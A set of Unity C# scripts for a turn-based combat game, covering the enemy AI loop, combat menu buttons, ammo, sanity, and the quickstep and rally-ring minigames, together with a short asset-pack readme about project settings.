/// </summary>
public class Pistol : MonoBehaviour
{
    public int ammoCount;
    public int maxAmmoCount;
    public List<Image> bulletImages;

    [SerializeField] Transform bullets;
    [SerializeField] GameObject bulletPrefab;
    [SerializeField] CombatButton combatButton;

    private void Start()
    {
        // Fill the magazine and spawn one HUD icon per round.
        ammoCount = maxAmmoCount;
        for (int round = 0; round < maxAmmoCount; round++)
        {
            var icon = Instantiate(bulletPrefab, Vector3.zero, Quaternion.identity, bullets);
            bulletImages.Add(icon.GetComponent<Image>());
        }

        //PlayerController.instance.onActionReady.AddListener(ConsumeAmmo);
        Aiming.instance.onAimingFinished.AddListener(ConsumeAmmo);
    }

    /// <summary>
    /// Spends one round when the current player action uses ammo, greys out
    /// the matching HUD icon, and disables the button once empty.
    /// </summary>
    public void ConsumeAmmo()
    {
        if (!PlayerController.instance.currentAction.useAmmo) { return; }
        if (ammoCount == 0) { return; }

        ammoCount = Mathf.Clamp(ammoCount - 1, 0, maxAmmoCount);
        bulletImages[ammoCount].color = new Color32(100, 100, 100, 255);

        if (ammoCount == 0)
        {
            DisableActionButton();
        }
    }

    /// <summary>Greys out / disables the pistol's combat button.</summary>
    public void DisableActionButton()
    {
        combatButton.DisableButton();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
/// <summary>
/// Drives the enemy's combat loop: picks an action, counts its speed slider
/// down to zero (respecting menu/stun/rally pauses), fires the action, then
/// repeats. Singleton via `instance`.
/// </summary>
public class EnemyController : MonoBehaviour
{
public Slider combatSlider;
[SerializeField] float sliderInterval;
[SerializeField] float speed;
[SerializeField] TextMeshProUGUI counterText;
[SerializeField] GameObject sliderHandle;
[SerializeField] GameObject intent;
[SerializeField] TextMeshProUGUI intentText;
// Speed value rolled for the current action; the slider starts here.
private float speedRoll;
public int effectiveDamage;
public List<EnemyAction> baseActionList;
// Actions currently usable (actions on cooldown are temporarily removed).
public List<EnemyAction> availableActionList;
public EnemyAction currentAction;
public UnityEvent onActionChosen;
public UnityEvent onActionReady;
public static EnemyController instance;
private void Awake()
{
instance = this;
}
// Start is called before the first frame update
// Hides the HUD, copies the base actions into the available pool, then
// picks the first action after a short delay.
private IEnumerator Start()
{
sliderHandle.SetActive(false);
intent.SetActive(false);
for (int i = 0; i < baseActionList.Count; i++)
{
availableActionList.Add(baseActionList[i]);
}
yield return new WaitForSeconds(1f);
ChooseCombatAction();
}
// Counts the speed slider down to zero, then triggers the action.
// Pauses while the combat menu, slider pause or rally ring is active;
// a stun aborts the current action and re-rolls a new one.
private IEnumerator ActivateCombatSlider(EnemyAction enemyAction)
{
combatSlider.value = speedRoll;
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
while (combatSlider.value >= 0)
{
if (CombatMenu.instance.isMenuActive) { yield return null; }
else if (EnemyStatusEffect.instance.isStun)
{
// combatSlider.value = 0; // Called this in CombatHUD to prevent repeated "Interrupted"
sliderHandle.SetActive(false);
intent.SetActive(false);
yield return new WaitUntil(() => EnemyStatusEffect.instance.isStun == false);
ChooseCombatAction();
yield break;
}
else if (CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
combatSlider.value = Mathf.Clamp(combatSlider.value - speed, 0, 100);
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
if (combatSlider.value == 0)
{
// Slider expired: fire the action, wait for combat resolution,
// then choose the next action.
onActionReady.Invoke();
sliderHandle.SetActive(false);
intent.SetActive(false);
CombatManager.instance.EnemyTriggerPrecombat(enemyAction);
DamageCalculator.instance.DeterminePlayerFate(effectiveDamage, enemyAction);
yield return new WaitUntil(() => CombatManager.instance.pauseSlider == false);
ChooseCombatAction();
yield break;
}
yield return new WaitForSeconds(sliderInterval);
}
}
}
/// <summary>
/// Picks a random available action, rolls its speed, linearly interpolates
/// its damage between (minSpeed, maxDamage) and (maxSpeed, minDamage) —
/// faster actions hit harder — and starts the slider countdown.
/// </summary>
public void ChooseCombatAction()
{
int randomAction = Random.Range(0, availableActionList.Count);
// Start action cooldown (if applicable)
currentAction = availableActionList[randomAction];
if (currentAction.cooldown > 0)
{
StartCoroutine(TriggerActionCooldown(currentAction.cooldown));
}
// Speed Roll
speedRoll = Random.Range(currentAction.minSpeed, currentAction.maxSpeed);
// Damage Calculation
float factor_a = (currentAction.maxDamage - currentAction.minDamage) / (currentAction.maxSpeed - currentAction.minSpeed);
float factor_b = currentAction.maxDamage - factor_a * currentAction.maxSpeed;
effectiveDamage = Mathf.RoundToInt(factor_a * speedRoll + factor_b);
StartCoroutine(ActivateCombatSlider(currentAction));
sliderHandle.SetActive(true);
// Display Intent
intent.SetActive(true);
intentText.text = effectiveDamage.ToString();
// Invoke Event
onActionChosen.Invoke();
}
// Removes the just-chosen action from the available pool for
// `cooldownDuration` seconds of battle time, then restores it.
private IEnumerator TriggerActionCooldown(float cooldownDuration)
{
EnemyAction myAction = currentAction;
availableActionList.Remove(myAction);
yield return StartCoroutine(BattleCountdown(cooldownDuration));
availableActionList.Add(myAction);
}
/// =========== HELPER ======================================================================================
/// <summary>
/// Waits until `duration` seconds of unpaused battle time have elapsed
/// (menu, slider pause and rally time do not count).
/// </summary>
public static IEnumerator BattleCountdown(float duration)
{
float timer = 0;
while (true)
{
if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
timer += Time.deltaTime;
if (timer >= duration)
{
yield break;
}
}
yield return null;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.Events;
using UnityEngine.EventSystems;
using TMPro;
using UnityEngine.UI;
using DG.Tweening;
//using DarkTonic.MasterAudio;
/// <summary>
/// One button in the combat menu. Handles pointer/keyboard selection and
/// confirmation, and previews its attached PlayerAction (speed slider,
/// sanity cost/gain, description box) while highlighted.
/// </summary>
public class CombatButton : MonoBehaviour, IPointerDownHandler, ISelectHandler, IDeselectHandler
{
    // Which menu layer this button belongs to. Root buttons open sub-menus
    // (via OnButtonClick) instead of queuing a combat action.
    public enum ActionType
    {
        Root,
        Attack,
        Defend,
        Stance,
        Wait
    }
    public ActionType actionType;
    public bool isDisabled;
    [SerializeField] Animator animator;
    [SerializeField] PlayerAction playerAction; // null for pure navigation buttons
    [SerializeField] TextMeshProUGUI buttonText;
    public UnityEvent OnButtonClick;
    public UnityEvent OnButtonSelect;
    //[Header("SFX")]
    //[SoundGroupAttribute] [SerializeField] string hoverSound = "Click";
    //[SerializeField] string hoverVariation = "Click 4";
    //[SoundGroupAttribute] [SerializeField] string clickSound = "Select";
    //[SerializeField] string clickVariation = "Select 4";

    void Start()
    {
        // Label the button after its action, when one is assigned.
        if (playerAction == null) { return; }
        if (!string.IsNullOrEmpty(playerAction.actionName))
        {
            buttonText.text = playerAction.actionName;
        }
    }

    // ======================= ADDED TO COMBAT MENU ====================================================================
    private void OnEnable()
    {
        if (isDisabled)
        {
            // Greyed-out state; also removes the button from UI navigation.
            // NOTE(review): the Selectable is never re-enabled anywhere in
            // this class — confirm disabled buttons are permanent by design.
            animator.SetBool("Disabled", true);
            GetComponent<Selectable>().enabled = false;
            return;
        }
        else
        {
            StartCoroutine(AddToCombatMenuList());
        }
    }

    private IEnumerator AddToCombatMenuList()
    {
        yield return new WaitForSeconds(0.1f); // Wait 0.1f for CombatMenu instance = this
        CombatMenu.instance.allButtons.Add(this);
        // Auto-highlight the first sibling button of the freshly opened group.
        if (this.transform.parent.GetChild(0).gameObject == this.gameObject)
        {
            SelectThisButton();
        }
    }

    // ======================= ON SELECT ====================================================================
    public void SelectThisButton()
    {
        if (isDisabled) { return; }
        EventSystem.current.SetSelectedGameObject(this.gameObject);
    }

    public void OnDeselect(BaseEventData data)
    {
        animator.SetBool("Selected", false);
    }

    public void OnSelect(BaseEventData eventData)
    {
        if (isDisabled) { return; }
        if (!CombatMenu.instance.isMenuActive) { return; }
        // Track the highlighted index so keyboard confirm hits this button.
        CombatMenu.instance.actionIndex = CombatMenu.instance.allButtons.IndexOf(this);
        animator.SetBool("Selected", true);
        if (playerAction == null)
        {
            // Navigation-only button: clear all previews.
            CombatHUD.instance.HidePreviewSlider();
            Sanity.instance.DisplaySanityText();
            CombatMenu.instance.HideInfoBox();
            return;
        }
        PlayerController.instance.SetCurrentAction(playerAction);
        // baseSpeed == 0 means no wind-up, so there is nothing to preview.
        if (playerAction.baseSpeed == 0)
        {
            CombatHUD.instance.HidePreviewSlider();
        }
        else if (playerAction.baseSpeed > 0)
        {
            PlayerController.instance.CalculateEffectiveSpeed();
            CombatHUD.instance.ShowPreviewSlider();
        }
        // Preview the sanity counter change this action would cause.
        if (playerAction.sanityCost > 0 || playerAction.sanityGain > 0)
        {
            Sanity.instance.DisplaySanityPreview(playerAction.sanityCost, playerAction.sanityGain);
        }
        else if (playerAction.sanityCost == 0)
        {
            Sanity.instance.DisplaySanityText();
        }
        CombatMenu.instance.DisplayInfoBox(playerAction.description);
    }

    // ======================= ON CONFIRM ====================================================================
    public void OnPointerDown(PointerEventData eventData)
    {
        if (isDisabled) { return; }
        ConfirmSelectedAction();
    }

    public void ConfirmSelectedAction()
    {
        StartCoroutine(ConfirmSelectedActionCo());
    }

    private IEnumerator ConfirmSelectedActionCo()
    {
        animator.SetTrigger("Pressed");
        yield return new WaitForSeconds(0.2f); // Wait for Button Shine
        switch (actionType)
        {
            case ActionType.Root:
                // Root buttons only navigate (open a sub-menu).
                OnButtonClick.Invoke();
                break;
            default:
                // Everything else queues its action with the player.
                PlayerController.instance.ChooseCombatAction(playerAction);
                break;
        }
    }

    // ======================= DISABLED ====================================================================
    public void DisableButton()
    {
        isDisabled = true;
    }

    /// AUDIO //////////////////////////////////////////////////////
    //private void PlayHoverSound()
    //{
    //    MasterAudio.PlaySoundAndForget("Click", 1f, 3f, 0f, "Click 4");
    //}
    //
    //private void PlayClickSound()
    //{
    //    MasterAudio.PlaySoundAndForget("Click", 1f, 1f, 0f, "Click 1");
    //}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using DG.Tweening;
using UnityEngine.Events;
/// <summary>
/// Activates the combat-animation sequence matching the current action,
/// pauses/resumes the shared combat slider, and raises start/finish events.
/// NOTE(review): this mirrors the slider/sequence handling in CombatManager —
/// confirm both components are still required.
/// </summary>
public class CombatSprites : MonoBehaviour
{
    [SerializeField] GameObject combatCanvas;
    [SerializeField] GameObject[] combatSequence;
    public bool pauseSlider;
    public UnityEvent onCombatStarted;
    public UnityEvent onCombatFinished;

    public static CombatSprites instance;

    private void Awake()
    {
        instance = this;
    }

    // Start is called before the first frame update
    void Start()
    {
        // Freeze the slider whenever pre-combat begins or the menu opens.
        CombatManager.instance.onPrecombatStart.AddListener(PauseCombatSlider);
        CombatMenu.instance.onMenuActive.AddListener(PauseCombatSlider);
    }

    public void PauseCombatSlider() => pauseSlider = true;

    public void ResumeCombatSlider() => pauseSlider = false;

    public void StartCombatSequence()
    {
        combatSequence[CombatManager.instance.currentSequence].SetActive(true);
        onCombatStarted.Invoke();
    }

    public void EndCombatSequence() // Called by Individual CombatSequence
    {
        ResumeCombatSlider();
        // Deactivate every sequence so the next action starts from a clean slate.
        for (int i = 0; i < combatSequence.Length; i++)
        {
            combatSequence[i].SetActive(false);
        }
        onCombatFinished.Invoke();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
using UnityEngine.EventSystems;
/// <summary>
/// Controller for the player's combat menu: tracks which sub-menu is open
/// (ROOT/ATTACK/DEFEND/WAIT), which button is highlighted, and slides the
/// action groups in and out with DOTween. Other systems subscribe to
/// onMenuActive to pause while the menu is open.
/// </summary>
public class CombatMenu : MonoBehaviour
{
    public enum MenuState
    {
        ROOT,
        ATTACK,
        DEFEND,
        WAIT
    }
    public MenuState menuState;
    public bool isMenuActive;             // true while the menu accepts input
    public bool actionQueued;             // true once an action has been chosen
    public List<CombatButton> allButtons; // buttons of the currently open group
    public int actionIndex;               // highlighted button's index into allButtons
    [SerializeField] SpriteRenderer playerSprite;
    private Material playerMat;           // drives the "_OutlineAlpha" highlight
    [Header("Action Groups")]
    [SerializeField] GameObject rootActionGroup;
    [SerializeField] RectTransform attackActions;
    [SerializeField] RectTransform defendActions;
    [SerializeField] RectTransform waitActions;
    [SerializeField] TextMeshProUGUI headerText;
    [Header("Other GUI Elements")]
    [SerializeField] GameObject auraVFX;
    [SerializeField] GameObject tentacles;
    [Header("Description Box")]
    [SerializeField] GameObject infoBox;
    [SerializeField] TextMeshProUGUI descriptionText;
    public UnityEvent onMenuActive;

    public static CombatMenu instance;

    private void Awake()
    {
        instance = this;
        playerMat = playerSprite.material;
    }

    private void OnEnable()
    {
        // Re-open at the root unless an action is already queued.
        if (!actionQueued)
        {
            //DisplayRootActions();
            RevealRootActions();
        }
    }

    private void Update()
    {
        // Keyboard shortcuts: Space confirms, A/B/X jump to sub-menus.
        if (actionQueued) { return; }
        if (!isMenuActive) { return; }
        if (Input.GetKeyDown(KeyCode.Space))
        {
            ConfirmCurrentAction();
        }
        else if (Input.GetKeyDown(KeyCode.A))
        {
            RevealATTACK();
        }
        else if (Input.GetKeyDown(KeyCode.B))
        {
            RevealDEFEND();
        }
        else if (Input.GetKeyDown(KeyCode.X))
        {
            RevealWAIT();
        }
    }

    public void ConfirmCurrentAction()
    {
        // NOTE(review): assumes actionIndex is within allButtons' bounds —
        // verify against the button registration timing in CombatButton.
        if (allButtons[actionIndex] == null) { return; }
        allButtons[actionIndex].ConfirmSelectedAction();
        // Root buttons keep the menu open (they only navigate).
        if (allButtons[actionIndex].actionType != CombatButton.ActionType.Root)
        {
            HideAllMenu();
        }
    }

    public void HideAllMenu()
    {
        StartCoroutine(HideAllMenuCo());
    }

    private IEnumerator HideAllMenuCo()
    {
        yield return new WaitForSeconds(0.2f); // Wait for Button Animation
        isMenuActive = false;
        allButtons.Clear();
        headerText.text = null;
        headerText.transform.parent.gameObject.SetActive(false);
        // Slide every action group off-screen to the left.
        //rootActions.DOLocalMoveX(-400f, 0.2f);
        attackActions.DOLocalMoveX(-400f, 0.2f);
        defendActions.DOLocalMoveX(-400f, 0.2f);
        waitActions.DOLocalMoveX(-400f, 0.2f);
        playerMat.SetFloat("_OutlineAlpha", 0f);
        auraVFX.SetActive(false);
        HideInfoBox();
    }

    public void RevealRootActions()
    {
        // Fire the "menu opened" event only on the closed -> open transition.
        if (!isMenuActive)
        {
            onMenuActive.Invoke();
        }
        menuState = MenuState.ROOT;
        attackActions.gameObject.SetActive(false);
        defendActions.gameObject.SetActive(false);
        waitActions.gameObject.SetActive(false);
        tentacles.SetActive(true);
        rootActionGroup.SetActive(true);
        playerMat.SetFloat("_OutlineAlpha", 0.8f); // highlight the player sprite
        auraVFX.SetActive(true);
        isMenuActive = true;
        headerText.text = null;
        headerText.transform.parent.gameObject.SetActive(false);
        HideInfoBox();
    }

    public void HideRootActions()
    {
        tentacles.SetActive(false);
        rootActionGroup.SetActive(false);
        playerMat.SetFloat("_OutlineAlpha", 0f);
    }

    public void RevealATTACK()
    {
        if (menuState == MenuState.ATTACK) { return; } // already open
        menuState = MenuState.ATTACK;
        rootActionGroup.gameObject.SetActive(false);
        tentacles.SetActive(false);
        allButtons.Clear(); // group's buttons re-register via their OnEnable
        attackActions.gameObject.SetActive(true);
        headerText.transform.parent.gameObject.SetActive(true);
        headerText.text = "ATTACK";
        attackActions.DOLocalMoveX(0f, 0.2f);
    }

    public void RevealDEFEND()
    {
        if (menuState == MenuState.DEFEND) { return; } // already open
        menuState = MenuState.DEFEND;
        rootActionGroup.gameObject.SetActive(false);
        tentacles.SetActive(false);
        allButtons.Clear(); // group's buttons re-register via their OnEnable
        defendActions.gameObject.SetActive(true);
        headerText.transform.parent.gameObject.SetActive(true);
        headerText.text = "DEFEND";
        defendActions.DOLocalMoveX(0f, 0.2f);
    }

    public void RevealWAIT()
    {
        if (menuState == MenuState.WAIT) { return; } // already open
        menuState = MenuState.WAIT;
        rootActionGroup.gameObject.SetActive(false);
        tentacles.SetActive(false);
        allButtons.Clear(); // group's buttons re-register via their OnEnable
        waitActions.gameObject.SetActive(true);
        headerText.transform.parent.gameObject.SetActive(true);
        headerText.text = "REGAIN";
        waitActions.DOLocalMoveX(0f, 0.2f);
    }

    public void DisplayInfoBox(string description)
    {
        infoBox.SetActive(true);
        descriptionText.text = description;
    }

    public void HideInfoBox()
    {
        infoBox.SetActive(false);
        descriptionText.text = null;
    }

    private void OnDisable()
    {
        // Drop UI focus so no button stays highlighted after the menu closes.
        EventSystem.current.SetSelectedGameObject(null);
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
/// <summary>
/// Per-sequence animation hooks (invoked as animation events): shows damage
/// numbers, applies outcome-dependent sprite effects (hit flash, blood), and
/// reports the end of the animation back to the CombatManager.
/// </summary>
public class CombatSequence : MonoBehaviour
{
    [SerializeField] SpriteRenderer playerSprite;
    [SerializeField] SpriteRenderer enemySprite;
    [SerializeField] GameObject bloodSprite;

    private Material playerMat;
    private Material enemyMat;

    private void Awake()
    {
        playerMat = playerSprite.material;
        enemyMat = enemySprite.material;
    }

    private void ShowEnemyDamage() => CombatHUD.instance.DisplayEnemyDamage();

    private void ShowPlayerDamage() => CombatHUD.instance.DisplayPlayerDamage();

    private void EnemySpriteEffect()
    {
        ApplyOutcomeEffect(EnemyFlashHit);
    }

    private void PlayerSpriteEffect()
    {
        ApplyOutcomeEffect(PlayerFlashHit);
    }

    // Shared outcome handling: a miss hides the blood overlay, a hit flashes
    // the target and shows blood, a graze changes nothing.
    private void ApplyOutcomeEffect(System.Action flashTarget)
    {
        switch (DamageCalculator.instance.combatOutcome)
        {
            case DamageCalculator.CombatOutcome.Missed:
                bloodSprite.SetActive(false);
                break;
            case DamageCalculator.CombatOutcome.Grazed:
                break;
            case DamageCalculator.CombatOutcome.Hit:
                flashTarget();
                bloodSprite.SetActive(true);
                break;
        }
    }

    public void PlayerFlashHit() => FlashHit(playerMat);

    public void EnemyFlashHit() => FlashHit(enemyMat);

    // Brief hit flash: blend the effect in fast, then fade it back out slowly.
    private void FlashHit(Material targetMat)
    {
        Sequence flashSequence = DOTween.Sequence();
        flashSequence.Append(targetMat.DOFloat(0.4f, "_HitEffectBlend", 0.1f));
        flashSequence.Append(targetMat.DOFloat(0f, "_HitEffectBlend", 0.7f));
    }

    private void FinishCombatAnimation()
    {
        CombatManager.instance.EndCombatSequence();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
/// <summary>
/// Arrow-sequence minigame: spawns a random sequence of directional arrows
/// and, if the player presses them all in order before combat resumes, puts
/// the player into the Quickstepping defend state (auto-dodge).
/// </summary>
public class Quickstep : MonoBehaviour
{
    [SerializeField] GameObject arrowPrefab;
    [SerializeField] int arrowCount;
    [SerializeField] Color color1; // "correct" arrow color
    [SerializeField] Color color2; // neutral / reset color
    [SerializeField] Material arrowMat;
    public List<Image> arrows;       // arrow images, in press order
    public List<string> directions;  // matching direction labels per arrow

    private bool isQuickstepping;
    private int arrowIndex; // next arrow the player must press

    public static Quickstep instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        CombatManager.instance.onPrecombatStart.AddListener(EndQuickstep);
    }

    private void Update()
    {
        if (!isQuickstepping) { return; }
        if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.DownArrow) || Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.UpArrow))
        {
            CheckArrow();
        }
    }

    /// Compares the pressed arrow key against the expected direction.
    private void CheckArrow()
    {
        if (arrowIndex >= arrows.Count) { return; } // sequence already complete
        switch (directions[arrowIndex])
        {
            case "RIGHT":
                if (Input.GetKeyDown(KeyCode.RightArrow)) { CorrectArrow(); }
                else { IncorrectArrow(); }
                break;
            case "UP":
                if (Input.GetKeyDown(KeyCode.UpArrow)) { CorrectArrow(); }
                else { IncorrectArrow(); }
                break;
            case "LEFT":
                if (Input.GetKeyDown(KeyCode.LeftArrow)) { CorrectArrow(); }
                else { IncorrectArrow(); }
                break;
            case "DOWN":
                if (Input.GetKeyDown(KeyCode.DownArrow)) { CorrectArrow(); }
                else { IncorrectArrow(); }
                break;
            default:
                Debug.Log("Incorrect string");
                break;
        }
    }

    private void CorrectArrow()
    {
        // Reveal the hidden "guess" arrow once the player reaches it.
        if (!arrows[arrowIndex].gameObject.activeSelf)
        {
            arrows[arrowIndex].gameObject.SetActive(true);
            arrows[arrowIndex].transform.parent.GetChild(1).gameObject.SetActive(false);
        }
        arrows[arrowIndex].transform.DOScale(1.2f, 0.2f);
        arrows[arrowIndex].color = color1;
        arrowIndex++;
        if (arrowIndex == arrows.Count)
        {
            Debug.Log("Successful Quickstep!");
            arrowMat.DOFloat(1, "_FadeAmount", 0.5f);
            PlayerController.instance.defendState = PlayerController.DefendState.Quickstepping;
        }
    }

    /// Any wrong key resets the whole sequence back to the first arrow.
    private void IncorrectArrow()
    {
        for (int i = 0; i < arrows.Count; i++)
        {
            arrows[i].transform.DOScale(1f, 0.2f);
            arrows[i].color = color2;
        }
        arrowIndex = 0;
    }

    public void SpawnArrows()
    {
        isQuickstepping = true;
        arrowMat.SetFloat("_FadeAmount", -0.1f);
        // REFACTOR: the original switch had four near-identical arms differing
        // only in label and z-rotation. Index order matches Random.Range(0, 4):
        // 0=RIGHT(0°), 1=UP(90°), 2=LEFT(180°), 3=DOWN(270°).
        string[] directionLabels = { "RIGHT", "UP", "LEFT", "DOWN" };
        for (int i = 0; i < arrowCount; i++)
        {
            int direction = Random.Range(0, 4);
            GameObject arrowObject = Instantiate(arrowPrefab, Vector3.zero, Quaternion.identity, this.transform);
            Image arrowImage = arrowObject.GetComponentInChildren<Image>();
            arrowImage.transform.localRotation = Quaternion.Euler(0.0f, 0.0f, 90.0f * direction);
            arrows.Add(arrowImage);
            directions.Add(directionLabels[direction]);
        }
        RandomizeArrowGuess();
    }

    /// Hides one arrow so the player must guess it from the question marker.
    private void RandomizeArrowGuess()
    {
        // NOTE(review): Random.Range(1, Count) is max-exclusive and never picks
        // index 0 — presumably so the first arrow is always visible; confirm.
        int randomGuess = Random.Range(1, arrows.Count);
        arrows[randomGuess].transform.parent.GetChild(1).gameObject.SetActive(true);
        arrows[randomGuess].gameObject.SetActive(false);
    }

    /// Tears down the minigame (also bound to onPrecombatStart in Start()).
    private void EndQuickstep()
    {
        isQuickstepping = false;
        for (int i = 0; i < arrows.Count; i++)
        {
            Destroy(arrows[i].transform.parent.gameObject);
        }
        arrows.Clear();
        directions.Clear();
        arrowIndex = 0;
        CombatHUD.instance.HidePlayerQueueText();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
/// <summary>
/// Tracks the player's sanity counter: actions add their sanityCost, regain
/// actions subtract sanityGain, and crossing doomThreshold inflicts DOOM.
/// Also renders the counter (and hover previews) on the HUD.
/// </summary>
public class Sanity : MonoBehaviour
{
    [SerializeField] TextMeshProUGUI sanityText;
    public int sanityCounter;
    [SerializeField] Color color1; // normal counter color
    [SerializeField] Color color2; // preview counter color
    [SerializeField] int doomThreshold = 100;

    public static Sanity instance;

    private void Awake()
    {
        instance = this;
    }

    void Start()
    {
        DisplaySanityText();
        PlayerController.instance.onActionChosen.AddListener(IncreaseSanity);
        CombatMenu.instance.onMenuActive.AddListener(CheckDOOM);
    }

    /// Shows what the counter would become if the hovered action were taken.
    public void DisplaySanityPreview(int cost, int gain) // Called by Combat Button
    {
        int previewCounter = Mathf.Clamp(sanityCounter + cost - gain, 0, 999);
        sanityText.text = previewCounter.ToString();
        sanityText.color = color2;
    }

    public void IncreaseSanity()
    {
        // FIX: clamp to the same 0-999 range used by RegainSanity and
        // DisplaySanityPreview; previously the increase was unclamped, so the
        // applied value could exceed 999 while the preview showed 999.
        sanityCounter = Mathf.Clamp(sanityCounter + PlayerController.instance.currentAction.sanityCost, 0, 999);
        DisplaySanityText();
    }

    /// Inflicts or removes DOOM depending on the current counter (checked
    /// each time the combat menu opens).
    private void CheckDOOM()
    {
        if (sanityCounter >= doomThreshold)
        {
            PlayerStatusEffect.instance.InflictDOOM();
        }
        else
        {
            PlayerStatusEffect.instance.RemoveDOOM();
        }
    }

    public void RegainSanity()
    {
        sanityCounter = Mathf.Clamp(sanityCounter - PlayerController.instance.currentAction.sanityGain, 0, 999);
        DisplaySanityText();
    }

    /// Renders the actual counter in the normal color.
    public void DisplaySanityText()
    {
        sanityText.text = sanityCounter.ToString();
        sanityText.color = color1;
    }
}
<file_sep>Thank you for purchasing the Haunted Town.
Please use the following project settings.
Edit->Project Settings->Player->Other Settings/Rendering
Set the Color Space to "Linear"
Edit->Project Settings->Graphics->Tier Settings
Set the Rendering Path to "Deferred"
If the Post Processing Stack is not set up yet, install it via Windows->Package Manager.
Follow the Unity docs to set up the Postprocessing stack: https://unity3d.com/how-to/set-up-post-processing-stack
You will find the corresponding profiles under scenes/scene*Profiles
Regards
TripleBrick
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
[CreateAssetMenu(menuName = "Player Action")]
public class PlayerAction : ScriptableObject
{
public enum ActionType
{
Attack,
Dodge,
Block,
Quickstep,
ShortWait,
LongWait
}
public ActionType actionType;
[Header("General")]
public string actionName;
[TextArea(5, 5)] public string description;
public int baseSpeed;
public int sanityCost;
public int sequenceID;
public bool useAmmo;
[Header("Attack")]
public int baseDamage;
public float baseHitChance;
[Header("Wait")]
public int sanityGain;
[Header("Stun")]
public bool STUN;
public int STUN_Counter;
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using TMPro;
/// <summary>
/// Timing minigame: after a random delay a shrinking ring appears; pressing
/// Space while the ring is within the sweet-spot scale window boosts the
/// player's queued action (its combat slider is pushed toward zero).
/// </summary>
public class RallyRing : MonoBehaviour
{
    [SerializeField] Slider playerSlider;
    [SerializeField] float minRallyDuration;
    [SerializeField] float maxRallyDuration;
    [SerializeField] float boostDuration;
    [SerializeField] float boostAmount;
    [SerializeField] float boostPct = 0.2f; // boost = baseSpeed * boostPct
    public bool isBoosted;
    public float timer; // countdown until the next ring spawns (<= 0 disables)
    [SerializeField] float maxTimer;
    [SerializeField] float minTimer;
    [SerializeField] RectTransform ring;
    [SerializeField] Image tokenImage;
    private Color originalColor;
    public bool isRallyActive;
    private Coroutine rallyCoroutine;

    public static RallyRing instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        originalColor = tokenImage.color;
        ring.gameObject.SetActive(false);
        CombatMenu.instance.onMenuActive.AddListener(DisableTimer);
    }

    private void OnEnable()
    {
        // Avoid spawning the ring the instant the GUI reappears.
        if (timer > 0f && timer < 0.5f)
        {
            timer += 1f; // Add one second on GUI re-enabled
        }
    }

    private void Update()
    {
        // Only tick while an action is queued and the menu is closed.
        if (CombatMenu.instance.isMenuActive) { return; }
        if (!CombatMenu.instance.actionQueued) { return; }
        if (timer > 0)
        {
            timer -= Time.deltaTime;
            if (timer <= 0)
            {
                SpawnRallyRing();
            }
        }
        if (isRallyActive)
        {
            if (Input.GetKeyDown(KeyCode.Space))
            {
                // Sweet spot: ring scale in (0.6, 1.2].
                if (ring.localScale.x <= 1.2f && ring.localScale.x > 0.6f)
                {
                    BoostActionSpeed();
                }
                else
                {
                    ring.gameObject.SetActive(false);
                    Debug.Log("Mistimed!");
                }
            }
        }
    }

    /// Re-arms the spawn countdown with a random delay.
    public void ChanceForRallyRing() // Called by PlayerController
    {
        timer = Random.Range(minTimer, maxTimer);
    }

    private void SpawnRallyRing()
    {
        rallyCoroutine = StartCoroutine(SpawnRallyRingCo());
    }

    private IEnumerator SpawnRallyRingCo()
    {
        // FIX: the original guard did `yield return null` when a rally was
        // already active, which only waited one frame and then ran the spawn
        // anyway. `yield break` actually aborts the duplicate spawn.
        if (isRallyActive) { yield break; }
        isRallyActive = true;
        ring.gameObject.SetActive(true);
        ring.localScale = new Vector2(3f, 3f);
        float rallyDuration = Random.Range(minRallyDuration, maxRallyDuration);
        ring.DOScale(0.5f, rallyDuration); // shrink toward the sweet spot
        yield return new WaitForSeconds(rallyDuration);
        isRallyActive = false;
    }

    private void BoostActionSpeed()
    {
        if (isBoosted) { return; } // one boost per ring
        StartCoroutine(BoostActionSpeedCo());
    }

    private IEnumerator BoostActionSpeedCo()
    {
        isBoosted = true;
        // Flash the token white as success feedback.
        Sequence mySequence = DOTween.Sequence();
        mySequence.Append(tokenImage.DOColor(Color.white, 0.2f));
        mySequence.Append(tokenImage.DOColor(originalColor, 0.2f));
        // Push the player's combat slider toward zero by a fraction of the
        // queued action's base speed.
        boostAmount = PlayerController.instance.currentAction.baseSpeed * boostPct;
        float newValue = Mathf.Clamp(PlayerController.instance.combatSlider.value - boostAmount, 0, 100);
        DOTween.To(() => PlayerController.instance.combatSlider.value, x => PlayerController.instance.combatSlider.value = x, newValue, boostDuration);
        yield return new WaitForSeconds(boostDuration + 0.2f);
        ring.gameObject.SetActive(false);
        isBoosted = false;
    }

    private void OnDisable()
    {
        //StopAllCoroutines();
        isBoosted = false;
    }

    /// Cancels any pending ring spawn (bound to the menu opening).
    private void DisableTimer()
    {
        timer = -1f;
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
/// <summary>
/// Misc extension methods: tagged-child component lookup, bulk list append,
/// and world-space rect overlap tests for RectTransforms.
/// </summary>
public static class Helper
{
    /// <summary>
    /// Returns the component of type <typeparamref name="T"/> on the first
